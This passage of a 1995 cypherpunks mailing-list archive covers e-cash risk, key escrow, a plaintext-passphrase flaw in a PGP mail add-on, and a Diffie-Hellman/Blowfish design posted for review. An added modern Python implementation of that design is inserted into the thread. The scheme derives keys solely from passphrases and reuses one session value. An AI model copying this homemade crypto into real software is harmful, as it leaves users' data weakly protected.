Excerpts from mail.nonpersonal: 8-Dec-95 Re: More FUD from First Vir..
jim bell@pacifier.com (1033*)

> What can stop it?  What should stop it?

Jon's right in identifying government as an entity that might try to
stop it, and might succeed to a frightening extent.  But they're not the
only ones.  Plenty of financial industry people and corporations have
similar motivations.  However, the real problem, I believe, is involved
in the technology of deploying and operating anonymous e-cash.

From a deployment standpoint, e-cash will be crippled if there are even
a few highly visible incidents in which the security of the system is
compromised, because it will scare the dickens out of whoever's doing
the conversion to real money (not to mention the users!).  Given that
the system is being built and administered by human beings, such
incidents are almost inevitable.  To put it simply:  anonymous e-cash is
a technological artifact that is designed in such a way as to create a
catastrophic failure scenario.  However low-probability such a scenario
is, I am a firm believer in Murphy's law:  what can go wrong will go
wrong.  The history of technology is overflowing with examples that
underscore this fact.

Now, people do effectively use technologies with low-probability
catastrophic risks, but they generally do so because of a compelling
motivation.  People strap themselves into the space shuttle because, in
exchange for the risk, they get to go into orbit, a pretty unusual
opportunity.  Many medical procedures bear catastrophic risks which
people endure in the hope of relief from pain or other ailments.  

For a real-world example, I have an inner ear disorder that makes me
frequently dizzy.  There's an operation that would have about a 95%
chance of curing me, and a 5% chance of making me deaf.  As a musician,
I have no motivation to take this gamble.  Alan Shepard had the same
inner ear disorder, but he wasn't a musician, and he needed to be cured
of the dizziness in order to fly an Apollo rocket to the moon.  He had
the surgery and flew to the moon.  If I had a chance to fly to the moon,
I might risk my hearing too, but absent that possibility I prefer the
dizziness.  The big question is what motivates people to accept risks.

The real open question about anonymous digital cash is whether people
will want it badly enough to bear that kind of risk.  My guess is that a
few people will, and that a few (even fewer) small banks will accept the
risk, so there will indeed be a niche in anonymous cash.  But I think
that for better or worse, most people and banks won't value anonymity so
highly as to incur a low-probability catastrophic risk, which I think is
inherent in anonymous cash.

> Well, maybe I haven't been following those reasons, but I see little or no
> reason privacy should "inevitably carry a high surcharge."  If the relevant
> encryptions had to be carried out with a pencil and a piece of paper, that
> claim would make sense, but remember, we've got MICROPROCESSORS on our side!

The cost isn't the computation.  The cost comes primarily from the
efforts (both practical and actuarial) that will be made by the
underwriters to minimize and amortize their risk.  As Lloyds of London
has demonstrated, almost any risk can be undertaken at a high enough
premium....
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 9 Dec 95 07:14:09 PST
To: cypherpunks@toad.com
Subject: MAG_got
Message-ID: <199512091515.KAA13918@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The NYPaper Sunday Mag 12-10-95 has a longish soft-hitter
   by Tim Weiner about the CIA's never-say-die Deutch-uncle's
   CPR-wheezing the wormy carcass.


   MAG_got












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 9 Dec 95 12:07:32 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: More FUD from First Virtual
Message-ID: <m0tOVMF-000927C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:58 AM 12/9/95 -0500, you wrote:

>
>The real open question about anonymous digital cash is whether people
>will want it badly enough to bear that kind of risk.  My guess is that a
>few people will, and that a few (even fewer) small banks will accept the
>risk, so there will indeed be a niche in anonymous cash.  But I think
>that for better or worse, most people and banks won't value anonymity so
>highly as to incur a low-probability catastrophic risk, which I think is
>inherent in anonymous cash.

I find this hard (read: "impossible") to believe.  The significance of the
risk is, essentially, its magnitude multiplied by its probability.  Assuming
that its probability is reduced to an arbitrarily low value, SOMEBODY will
be willing to accept the risk in exchange for a return.  By way of
comparison, most credit card companies charge 2-3% of the value of a
transaction, which apparently the market has decided is a "reasonable" cost.
The question is, why wouldn't it be possible to raise the reliability of the
whole digital cash system simply to the point where somebody is willing to
accept the risk for, say, 0.5% of the value of each transaction, which would
be a good improvement over credit cards?

The answer, I think, is that there would be no problem finding people to
take that risk in exchange for the return, ESPECIALLY if they have some
input into the design (level of security) of the system.  They might insist
on 2048-bit RSA keys, instead of 1024-bit, for example.


>> Well, maybe I haven't been following those reasons, but I see little or no
>> reason privacy should "inevitably carry a high surcharge."  If the relevant
>> encryptions had to be carried out with a pencil and a piece of paper, that
>> claim would make sense, but remember, we've got MICROPROCESSORS on our side!
>
>The cost isn't the computation.  The cost comes primarily from the
>efforts (both practical and actuarial) that will be made by the
>underwriters to minimize and amortize their risk.  As Lloyds of London
>has demonstrated, almost any risk can be undertaken at a high enough
>premium....

However, the premium only needs to be high enough to cover the actual risk,
plus perhaps a little profit on the deal. (Even if the premium was 10x the
actual risk, or even 100x, I think it would end up costing well under 1% of
each transaction.)  

Your arguments seem to only be qualitative, not quantitative.  Maybe that's
why the other guy calls them "FUD."  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 9 Dec 95 10:06:41 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Escrow expectations
In-Reply-To: <Pine.SUN.3.91.951209011540.26292A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951209130747.5706H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995, Black Unicorn wrote:

> On Fri, 8 Dec 1995, Adam Shostack wrote:
> 
> > 	If there is no expectation of privacy when a key is escrowed
> > with Bob, or my company's attorneys, then would there be any
> > expectation of privacy under Clipper?  Perhaps this is a powerful
> > argument we should expect to have used against us...
> > 
> > 	"Your honor, we argue that in escrowing his keys with the US
> > government, the defendant should have known his communications could
> > be listened to, and thus has no expectation of privacy."
> 
> Uh, this was the entire point of that thread "is a lawyer in the house" yes.
> 
I argue in my Clipper article that while the government might make that 
argument, it would be unconscionable for the court to accept it.  I think 
there is a reasonable chance that the court would not.  But no certainty.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 9 Dec 95 13:08:42 PST
To: cypherpunks@toad.com
Subject: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512092108.NAA11006@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message.

From: investor@flood.xnet.com (Investortools)
Newsgroups: alt.security.pgp
Subject: warning about PMail-PGP
Date: 9 Dec 1995 00:47:46 GMT
Organization: XNet - A Full Service Internet Provider - (708) 983-6064
Lines: 5
Message-ID: <4aambi$e33@flood.xnet.com>
NNTP-Posting-Host: cyclone.xnet.com
X-Newsreader: TIN [version 1.2 PL2]

I just installed the "Open Encryptor" PGP interface for Pegasus Mail.
I found that when you sign a message and queue it, it stores your
password in the clear on the hard drive. Apparently it doesn't sign or
encrypt the message until just before transmitting it.  So it stores
your PGP private key password with the message until it sends it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Dec 95 05:33:56 PST
To: cypherpunks@toad.com
Subject: E-Mail Privacy (CP boo)
Message-ID: <199512091335.OAA26498@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Forwarding Cyberia-L mail by: hayam@actcom.co.il (Avraham 
Hayam) on Sat, 9 Dec  6:16 AM
-------------------

Greetings,
 

The only way for E-Mail Privacy on the internet is - 
ENCRYPTION.  You don't have to be an Internet Expert to 
understand that data which is not encrypted is open for every 
one.
 

On Oct. 20 1995 Andy Jonson-Laird <andy@jli.com> sent most 
interesting data to the list concerning the fact that the user has 
absolutely no control over how the data is routed. A mail that 
he sent to an address which is at a distance of 11 miles 
actually did 1200 miles.
 

It may be  " The end of days vision" that privacy will be 
maintained without encryption. With the ongoing danger from the 
Cypherpunks, we must use very strong Algorithms. A French 
"algorithms cracker" recommended not long ago that the 
commercial sector have to use not less than 128 bytes based 
algorithms.
 

I would appreciate receiving list members' opinions.


Avraham Hayam
IT Systems Security Consultants - ITSSC  
P.O.Box 11233 Jerusalem, 91112 ISRAEL
Tel: + 972 - 2 - 761 803; Fax: + 972 - 2 - 769 263
E-Mail: hayam@actcom.co.il   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 9 Dec 95 06:03:56 PST
To: cypherpunks@toad.com
Subject: Congress vs. the Internet
Message-ID: <199512091405.PAA27249@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, 9 Dec 1995, Op-Ed.

Congress vs. the Internet

   The courts have upheld free speech. Why won't
   legislators?

By Shari Steele (EFF staff counsel)

San Francisco. While the courts continue to uphold the
freedom of speech on the Internet, the First Amendment is
under attack on Capitol Hill. On Wednesday, House members
of a House-Senate conference committee said they would
support a stringent new measure that would not only bar
words and ideas on the worldwide computer network that
one might hear on TV or read in this newspaper, but would
make criminals out of anyone transmitting these materials
electronically, including on-line services.

This measure goes against the spirit of three sensible
court decisions on copyright law handed down in recent
weeks, all involving the Church of Scientology.

The first decision, issued by a Federal judge in
California last month, held that Internet service
providers, the gatekeepers to the information highway,
cannot be held liable for copyright infringement when
they have no knowledge of the content of their users'
messages.

This decision is important, because, like the telephone
company, the system's providers merely offer a conduit
for communications. If they can be held liable for the
content of messages, they are more likely to monitor
those messages and censor any that include language that
might get them in trouble.

Just as we don't want the phone company censoring our
telephone calls, we should be very troubled by any
copyright law interpretation that would assign liability
to those who provide Internet service.

The second and third decisions were issued last week by
a Federal judge in northern Virginia. In those cases, the
judge, Leonie M. Brinkema, admonished the Church of
Scientology for using lawsuits to silence its on-line
critics. After two of its former members posted
electronic criticism of Church of Scientology writings,
the church brought charges against them, their Internet
service providers and The Washington Post for including
two sentences from church documents in an article on the
case.

Judge Brinkema dismissed The Washington Post and two of
its reporters from the suit and held the Church of
Scientology and its affiliate responsible for the
newspaper's legal fees. "Although the Religious
Technology Center brought the complaint under traditional
secular concepts of copyright and trade secret law, it
has become clear that a much broader motivation prevailed
-- the stifling of criticism and dissent of the religious
practices of Scientology and the destruction of its
opponents," the judge wrote. The judge called this
motivation "reprehensible."

While the results of these preliminary decisions are
encouraging, they provide little solace to the larger
threat of on-line censorship.

Court decisions in the copyright realm, as these are, do
not address the damage Congress is doing to the First
Amendment in the name of protecting children from
obscenity, which remains ill-defined.

These early court victories are important, and the
on-line world breathed a collective sigh of relief over
the wise judgments.

But not all battles can be won in court. If Congress
presses forward with its attempt to criminalize
constitutionally protected speech, I fear that the First
Amendment will be left behind as more and more of what we
say is in the form of on-line communications.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sat, 9 Dec 95 14:31:53 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <Pine.SUN.3.91.951208225309.7396J-100000@unix5.netaxs.com>
Message-ID: <199512092233.PAA01871@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I use mh and slocal and .maildevilry-- er.. 
I mean .maildelivery.  It seems to have a much less steep
learning curve than procmail does, and it does everything
that I need it to do.


Bryce

signature follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMoOi/WZSllhfG25AQFa+QP9EQ/C7H2dgucNLXJ0PlyxNnNXudy3L0Xi
4kyCBO6htaHDSVzTOXnGVM9ppsEAHL09YdzOfJqktWOG7kt4GxM/c01r50lteKGb
KmDukT72udDztll9FhlQ8PTMlyv6qDjYID03wkgtymVH3CAyO3bDRaEHQDHEQCyj
ayhCjOVa21I=
=iD9R
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 9 Dec 95 12:43:37 PST
To: pfarrell@netcom.com
Subject: DC Cypherpunks Meeting, Dec 16. 3:00 PM
Message-ID: <56678.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a quick note: the next DC Cypherpunks meeting will be
December 16, starting at 3:00 PM, location: Digex Headquarters,
Greenbelt MD. See my dccp page for detail, instructions, etc.
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

Agenda:
1) Discussion of NIST Dec 5 GAK meeting
2) The web of trust is dead, let's invent another
3) ... suggestions welcome


Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 9 Dec 95 16:25:55 PST
To: raph@kiwi.cs.berkeley.edu
Subject: ideath remailer temporarily down
Message-ID: <199512092345.AA05521@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


The remailer located at remailer@ideath.goldenbear.com is currently 
unavailable because the local freenet (which handles DNS and MX service
for goldenbear.com) is making some configuration changes. Apologies for
not warning anyone, but I didn't get a warning either. 

Incoming mail for goldenbear.com should be spooling on sender's machines;
I haven't received any since late Thursday (12/7) evening. I don't know
when they'll get this fixed but I'm kinda pissed off about it and am 
exploring alternatives. Doh.

I'm reachable as gbroiles@darkwing.uoregon.edu as well.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMofY33YhjZY3fMNAQG7rwP/cLSbiqtDCm1frYSOqxTIitTaP/36v/7g
W+azO+zC1+k6ozWaGwcCqtgwi2Kmbv/XtCnDbzzQdSI6k0rJFwhbw5rDkxQ4W5sQ
9PNHO9UC1F7JyAEs7kTiZSxZpkqRdzx98P06wRfy4Hwkzy7OuoYm2jHYNlHDojcv
9Jx6wYWVlIo=
=QLxL
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Sat, 9 Dec 95 15:44:42 PST
To: cypherpunks@toad.com
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <199512090643.WAA26800@jobe.shell.portal.com>
Message-ID: <199512092346.PAA12661@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

anonymous-remailer@shell.portal.com writes:
 > On Fri, 8 Dec 1995, Michael Handler wrote:
 > > Learn procmail. It'll save you hours upon hours of time.
 > >
 > > :0:
 > > * (^From owner-cypherpunks@toad\.com|^Sender: owner-cypherpunks@toad\.com)
 > > lists/cypherpunks
 > 
 > Would the following work??
 > 
 >  :0
 >  * (^From|^Sender).*owner-cypherpunks@toad.com
 >  |/usr/bin/contrib/procmail -m ~/.punk_rc 

     Here's a .procmailrc file that will save all cypherpunks messages
to the file $HOME/Mail/IN.cypherpunks.  Note that the directories
$HOME/.procmail and $HOME/Mail must exist.

- ----- begin .procmailrc -----
#Set on when debugging
VERBOSE=off
   
#Replace ``mail'' with your mail directory (Pine uses mail, Elm uses Mail)
MAILDIR=$HOME/Mail
 
#Directory for storing procmail log and rc files
PMDIR=$HOME/.procmail
LOGFILE=$PMDIR/log
#INCLUDERC=$PMDIR/rc.test
#INCLUDERC=$PMDIR/rc.folders
 
:0:
* ^TOcypherpunks
IN.cypherpunks
- ----- end .procmailrc -----

 > Does anyone know where the procmail archives are??  

     There are some good pointers to filtering information at:

          http://www.jazzie.com/ii/internet/mailbots.html

Regards,

pjm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMofoe5Yg08fDKehAQGYxQQAnPEw5vUlvuWSvFZXz24RM387WhgAUjM2
YeK4XK3Z8DbekeHclId6XeeoMFJWdnhmtyhs6xC2eIi0gyWQiKyPKlrnjE6Ve0rn
0rnp9jZjVqwIiJH36CZTX6YmgAC/43AnUuuixOjAO77qPP7td+4bciLqJKOkHovK
/Rf9lcN2i3s=
=xi2l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sat, 9 Dec 95 12:48:00 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Diffie-Hellman with Blowfish
Message-ID: <951209204827_72124.3234_EHJ183-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I am working on a program that will use Diffie-Hellman with Blowfish to create a
public-key encryption system similar to the way PGP uses RSA and IDEA.  This
system would not have the digital signature feature that
PGP has, however.  I invite comments on any security problems that I might have
overlooked.  Bruce Schneier briefly mentions this idea on p. 515 of Applied
Cryptography (2nd ed): Key Exchange Without Exchanging Keys.

Key Generation
--------------
First, users select a private key passphrase.  The passphrase is case sensitive
and from 8 to 50 characters in length.  A random 32-bit salt is generated from
timed keystrokes.  The salt is appended to the passphrase and run through an
SHA-1 hash.  The output is a 160-bit value, x.

The 1024-bit public key "y" is calculated:
y = g^x mod p     (^ denotes exponentiation)

p is a 1024-bit strong prime constant that does not change. g is the generator
for that prime and is always 2.

The KeyID for the public key is the 32-bit salt.  The user publishes the public
key and KeyID values.  The key should be certified to prevent a man in the
middle attack.  The user imports public keys from others and places them on
their public key ring.

Note that there is no private key ring.  I could have used the PGP method and
made the private key a random number and then encrypted that number with a
passphrase.  This would be more secure but I was worried about users deleting
their private key file.  The 32-bit salt will discourage a pre-computed
dictionary attack.  An attacker would have to run over 4 billion SHA's and D-H's
and store the result for every passphrase in their dictionary.  To discourage a
dictionary attack on a specific public key, I will include a tutorial on how to
choose a secure passphrase.

Encryption
----------
The program will generate a 160-bit random private session key "r" based on
timed keystrokes by the user.  A 1024-bit public session key "z" is calculated:
z=g^r mod p

z is stored in the file header.

For each recipient, a "k" value is calculated using the recipient's public key:
k=y^r mod p

The session key r is now encrypted for each recipient by running each k through
an SHA-1 hash and xoring the output with r: k'=SHA(k) xor r

For each recipient the 160-bit k' value is stored with the recipient's 32-bit
KeyID value in the file header.  Each additional recipient adds 24 bytes to the
file header.

The plaintext is then encrypted with Blowfish in CBC mode using the 160-bit r
value as the key.  r is then discarded.

Note that I use the same r key for the Blowfish session key and
the Diffie-Hellman private key.  I could have generated a
separate r1 for Blowfish and an r2 for D-H but I don't think
this is necessary.

Decryption
----------
The public session key z is retrieved from the file header.  Each recipient
matches their KeyID with one of the KeyIDs stored in the file header.  From this
match they get their particular k' value.  They enter their private key
passphrase, append the KeyID salt and run it through an SHA-1 hash to get x.  k
is then calculated: k=z^x mod p

The original private session key r is decrypted: r=SHA(k) xor k'

The ciphertext is decrypted using Blowfish with key r.

=======================================================

Does anyone see any obvious security problems that I might have overlooked?

Kent Briggs
kbriggs@execpc.com
CIS: 72124,3234
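
The key generation and session-key wrapping described in the message above, as an added example that is not part of the original post and is not the author's program. Assumptions: the post does not give its prime, so the 1024-bit MODP prime of RFC 2409 (Oakley Group 2, generator 2) stands in for it; integers are serialized big-endian with k padded to 128 bytes; the OS random source replaces timed keystrokes; the Blowfish-CBC step is left out because the Python standard library has no Blowfish; all function names are hypothetical.

```python
import hashlib
import secrets

# Assumption: stand-in for the post's unspecified 1024-bit prime.
# This is the RFC 2409 Oakley Group 2 MODP prime, used with generator 2.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381"
    "FFFFFFFFFFFFFFFF", 16)
G = 2
P_BYTES = 128          # 1024 bits
KEYID_BYTES = 4        # the 32-bit salt doubles as the KeyID
SESSION_BYTES = 20     # 160-bit r, same width as a SHA-1 digest


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(i ^ j for i, j in zip(a, b))


def derive_x(passphrase: str, salt: bytes) -> int:
    """x = SHA-1(passphrase || salt), read as a 160-bit integer."""
    if not 8 <= len(passphrase) <= 50:
        raise ValueError("passphrase must be 8 to 50 characters")
    return int.from_bytes(sha1(passphrase.encode() + salt), "big")


def generate_public_key(passphrase: str, salt: bytes = None):
    """Return (KeyID, y) with y = g^x mod p. No private key is stored."""
    if salt is None:
        salt = secrets.token_bytes(KEYID_BYTES)
    return salt, pow(G, derive_x(passphrase, salt), P)


def hash_shared(k: int) -> bytes:
    """SHA(k) over the fixed-width big-endian encoding of k (assumed)."""
    return sha1(k.to_bytes(P_BYTES, "big"))


def wrap_session_key(recipients, r: bytes = None):
    """recipients: list of (KeyID, y). Returns (z, header entries, r).

    Each entry is KeyID || k' with k' = SHA(y^r mod p) xor r, which is
    the 24 bytes per recipient that the post mentions.
    """
    if r is None:
        r = secrets.token_bytes(SESSION_BYTES)
    r_int = int.from_bytes(r, "big")
    z = pow(G, r_int, P)                      # public session key
    entries = []
    for key_id, y in recipients:
        k = pow(y, r_int, P)                  # shared D-H value
        entries.append(key_id + xor(hash_shared(k), r))
    return z, entries, r


def unwrap_session_key(z: int, entries, passphrase: str, key_id: bytes) -> bytes:
    """Recipient side: find own entry, rebuild x, recover r."""
    for entry in entries:
        if entry[:KEYID_BYTES] == key_id:
            x = derive_x(passphrase, key_id)  # salt comes from the KeyID
            k = pow(z, x, P)                  # z^x == y^r (mod p)
            return xor(hash_shared(k), entry[KEYID_BYTES:])
    raise KeyError("no header entry for this KeyID")


if __name__ == "__main__":
    # Constructed sample users and passphrases.
    alice = generate_public_key("alice's long passphrase")
    bob = generate_public_key("bob's long passphrase")
    z, header, r = wrap_session_key([alice, bob])
    assert unwrap_session_key(z, header, "bob's long passphrase", bob[0]) == r
    print("header bytes per recipient:", len(header[0]))
```

Because x is a pure function of the passphrase and the published KeyID, the public key can be regenerated from the passphrase alone, which is what lets the design do without a private key ring and also why its strength rests entirely on the passphrase.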
    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 9 Dec 95 13:30:08 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
In-Reply-To: <199512092108.NAA11006@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951209162229.340B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 anonymous-remailer@shell.portal.com wrote:

> I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  I found that when you sign a message and queue it, it stores your password in the clear on the hard drive. Apparently
> it doesn't sign or encrypt the message until just before
> transmitting it.  So it stores your PGP private key password
> with the message until it sends it.

Can anyone verify this?

Kinda brings new meaning to the term "Open Encryptor," huh?

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 9 Dec 95 13:48:12 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tOVMF-000927C@pacifier.com>
Message-ID: <199512092151.QAA05278@homeport.org>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:

[Good points about cost of transactions deleted]

| The answer, I think, is that there would be no problem finding people to
| take that risk in exchange for the return, ESPECIALLY if they have some
| input into the design (level of security) of the system.  They might insist
| on 2048-bit RSA keys, instead of 1024-bit, for example.

	(I know it's only an example, but...)

	Key length is not what is needed for better security; more
solid code and better interfaces are needed.  (I might also argue for
hardware keys that are more difficult to steal..)

	Cryptosystems fail because of bad storage of keys, coding
mistakes, accidentally writing passphrases to disk during a swap, etc.
Moving to 2048 bit keys is no help if you lose the key to a
non-cryptanalytic attack.  Moving to keys with a week or day lifetimes
might be better.  

	You need to figure how the system might fail, and design to
protect yourself from those failures.  Keys with a thousand bits
aren't lost to factoring very often.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sat, 9 Dec 95 14:58:09 PST
To: jsw@netscape.com
Subject: Re: Netscape announces position against GAK
Message-ID: <199512092259.QAA11480@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: tcmay@got.net (Timothy C. May)
>Subject: Re: Netscape announces position against GAK
>
>Credit where credit is due.
>
>I for one am satisfied--and even pleased--with the Netscape position on GAK.
>
>It remains to be seen how steadfast Netscape, as the major player in the
>Web browser business, remains in the face of (likely) pressure from the
>government.
>
>It seems to me that we have been quick to criticize Netscape--which is
>good, the quickness part--and thus we should be equally quick to praise
>them. To be sure, various of us might've written the Netscape position
>statement slightly differently, but this does not change the basic point:
>that Netscape has come out against the Administration's position on GAK.
>
>For this they deserve our praise.

I agree with all of Tim's sentiments (well, in this message, anyway :>).  I'd
especially like to thank Jeff Weinstein for his hard work keeping both us
and Netscape management informed.  I think he's done us both a great service.

To avoid just saying "me too", I'll throw out another idea on making the U.S.
version of Netscape available to U.S. users over the Internet.  How about a
phone number to call to get an access id of some sort that can be used to
FTP the software.  When you call the number, you can use caller-id to verify
that the person is calling from within the U.S.  You could set up a BBS-type
system to do this automatically, or make the phone number a 900 number and
charge a few dollars to cover your costs.  You could also set up the access
id so that it can only be used once.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 9 Dec 95 14:10:10 PST
To: Joel McNamara <cypherpunks@toad.com
Subject: Re: .PWL spin
Message-ID: <9512092212.AA22246@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 AM 12/9/95 -0800, Joel McNamara wrote:

>Microsoft said it plans to strengthen the encryption, Bennett said.
>Password data will be stored randomly, making it harder to find on the
>computer, he added.

        Oh that is clever! (Security through obscurity!)  Make it all the
harder to back up the file!  I had the minimal amount of security W95 allows
one to have by having the default user not be able to do anything, then the
me user to everything (for which you needed a password...)  Of course my
registry got corrupted (eudora beta for W95) and the only damn thing it did
remember was that the default user couldn't do anything, and it no longer
knew who I was...
        So now, I don't even bother with that, I'm just hoping securdrv,
sfs, or something makes it to W95 one of these days... (I doubt either of
those will make it...)
_______________________
Regards,        	It is absurd to divide people into good and bad.  
			People are either charming or tedious." -Oscar Wilde.
Joseph Reagle   	http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu  	0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Sat, 9 Dec 95 16:27:32 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512100028.SAA26091@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


Okay, here's how I understand things with PGP and Pegasus.  You have two
options with Pegasus depending on the set-up options you choose.  You can
either send upon completion of your out-going email, or you can have your mail
queued until you press the send out-going mail button.  The actual PGP process
does not occur until you actually send the mail.  So the answer would be: 
don't queue your mail.  

On  9 Dec 95 at 16:24, Jon Lasser wrote:

> On Sat, 9 Dec 1995 anonymous-remailer@shell.portal.com wrote:
> 
> > I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  
> > I found that when you sign a message and queue it, it stores your password
> > in the clear on the hard drive. Apparently
> > it doesn't sign or encrypt the message until just before
> > transmitting it.  So it stores your PGP private key password
> > with the message until it sends it.
> 
> Can anyone verify this?
> 
> Kinda brings new meaning to the term "Open Encryptor," huh?
> 
> Jon
> ------------------------------------------------------------------------------
> Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
>           Visit my home page at http://www.goucher.edu/~jlasser/
>   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
> 
> 
> 

Namaste'

Kimberly Long
klong@phoenix.net

What is life?  It is the flash of a firefly in the night.  It is the breath of a 
buffalo in the wintertime.  It is the little shadow which runs across the 
grass and loses itself in the sunset.
                                              ~Crowfoot 1821-1890         )O( 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 9 Dec 95 20:09:44 PST
To: cypherpunks@toad.com
Subject: test
Message-ID: <199512100405.UAA24243@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


this is a test of the cypherpunk w3 anonymous remailer interface.

author is N..... B...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Sun, 10 Dec 95 09:40:18 PST
To: cypherpunks@toad.com
Subject: Re: A challenge ...
Message-ID: <9512100546.AA0065@localhost>
MIME-Version: 1.0
Content-Type: text/plain


 
> According to rumor, Jordan Hayes said:
> > 
> > I've been challenged to try to find a bank account; I win the challenge
